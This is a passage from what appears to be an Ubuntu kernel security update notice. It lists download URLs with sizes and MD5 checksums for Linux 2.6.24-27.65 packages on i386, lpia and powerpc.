http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32672 7135f346092b651dafed111b91aee44d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    47602 e55422dc48484675642c96bdbc673595\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2089276 69416120cd161789b598b2b93034db07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb\n      Size/MD5:   707576 d26794effd4e857da1db4d28e9407611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163034 9cc84b270528d0fef36320974b415392\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   236710 755a3caeceece8650e46706804c6e072\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   150836 169c287e6bc754d02924a719d34aad29\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   156072 9ff98bc4b62d033785de95858201c353\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    33388 860c1b56a45914246929757c815f5ec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92446 6525df043e2a865a6eb646f015140e31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb\n      Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   334046 06512921aae848be603af54dc56f72e6\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    62718 e53308b729496be4a0e343535769c74e\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   105746 034c14e0418581e1b8b56913246e96de\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   704830 ef370acc49192e464ef553984e361d88\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   243328 b280fefee27294e988529239616e68fe\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   387992 53b23049b6f79a9609349927adec3443\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   657530 98dd4c49966d886237bed19fddb84057\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb\n      Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   266748 d71a805e23acc800f21449d312975e04\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   201688 94056840984e621b385099d261ce2420\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   199752 9d4225f0960410c78279f61aa02471da\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    46836 10f5de3e02406e28d373098a6613860b\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:     8486 80580934d5e5f6909c396732bedf2055\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b\n    